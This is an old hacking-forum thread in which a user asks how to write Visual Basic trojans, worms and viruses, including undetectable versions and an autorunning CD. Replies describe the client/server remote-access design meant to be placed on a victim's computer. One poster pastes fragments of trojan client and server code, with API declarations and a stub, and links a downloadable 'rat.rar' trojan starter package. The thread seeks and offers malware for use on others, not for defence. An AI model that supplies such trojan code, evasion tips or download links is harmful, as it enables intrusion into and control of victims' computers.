visual basic trojans

Questions about programming languages and debugging
Post Reply
User avatar
thedonnorparty
forum buddy
forum buddy
Posts: 13
Joined: 09 Dec 2006, 17:00
17

visual basic trojans

Post by thedonnorparty »

i was wondering if anyone could show me how to make a visual basic trojan, worm, and virus i remember seeing a thread like it but i never ended up finding it with the search tool.

User avatar
floodhound2
∑lectronic counselor
∑lectronic counselor
Posts: 2117
Joined: 03 Sep 2006, 16:00
17
Location: 127.0.0.1
Contact:

Post by floodhound2 »

Learn winsock (if i remember the spelling) and try using other objects that are not intended for Trojans like the object for making a web browser, hum there is another one, but I cant remember at this writing. I like using it for web bots etc.

Standard way of going about it is that You'll need to make a client and a server (two separate programs). One of them you'll have to place on the victims computer.

I have made a few. If you need it I can put up some source code, but it is old and anti virus would most likely detect them.

User avatar
thedonnorparty
forum buddy
forum buddy
Posts: 13
Joined: 09 Dec 2006, 17:00
17

Post by thedonnorparty »

please do, extra kudos for undetectable versions or atleast to tell how, random but how do i make a CD that autoruns a .vbs file or a .exe. file when i pop it in?
source please?

User avatar
Big-E
Administrator
Administrator
Posts: 1332
Joined: 16 May 2007, 16:00
16
Location: IN UR ____ , ____ING UR _____ .
Contact:

Post by Big-E »

We do not just give things out to people, they have to earn them. No one ever gave us cake, so why do people now thing we should give them cake so they can eat it too?

User avatar
sub
Newbie
Newbie
Posts: 5
Joined: 11 Aug 2008, 16:00
15
Contact:

Post by sub »

Where I can find tutorial about this? :cry: Which website?

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

you can find plenty on the net, simply google for "winsock vb"...here's a good one for example:
http://www.phoenixbit.com/site/tutorial ... dpbnNvY2sx

:wink:

User avatar
sub
Newbie
Newbie
Posts: 5
Joined: 11 Aug 2008, 16:00
15
Contact:

Post by sub »

Thank you very much. :D

User avatar
floodhound2
∑lectronic counselor
∑lectronic counselor
Posts: 2117
Joined: 03 Sep 2006, 16:00
17
Location: 127.0.0.1
Contact:

Post by floodhound2 »

Here this should get you going
server:

Code: Select all

Private Sub Form_Load()
    'On Error Resume Next
    Dim SystemPath As String, ZLIBPath As String
End Function
** see below
Last edited by floodhound2 on 15 Aug 2008, 07:11, edited 1 time in total.

User avatar
floodhound2
∑lectronic counselor
∑lectronic counselor
Posts: 2117
Joined: 03 Sep 2006, 16:00
17
Location: 127.0.0.1
Contact:

Post by floodhound2 »

and the client

Code: Select all

Option Explicit

Private Declare Function ShellExecute Lib "SHELL32.DLL" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Sub RtlMoveMemory Lib "KERNEL32.DLL" (hpvDest As Any, hpvSource As Any, ByVal cbCopy As Long)
Private Declare Function uncompress Lib "ZLIB.DLL" (dest As Any, destLen As Any, src As Any, ByVal srcLen As Long) As Long
Or Pm me and ill send you all the files

*** see below
Last edited by floodhound2 on 15 Aug 2008, 07:11, edited 1 time in total.

User avatar
floodhound2
∑lectronic counselor
∑lectronic counselor
Posts: 2117
Joined: 03 Sep 2006, 16:00
17
Location: 127.0.0.1
Contact:

Post by floodhound2 »

Complete source code is located below for any one that want a VB Trojan starter package.

I hold no responsibility for damages to your PC however I think no "real" damage can be done. It will just making your PC un-user friendly if you screw things up. On the other hand if you don't screw something up you are not learning.

http://www.floodhound.com/Downloads/rat.rar

Post Reply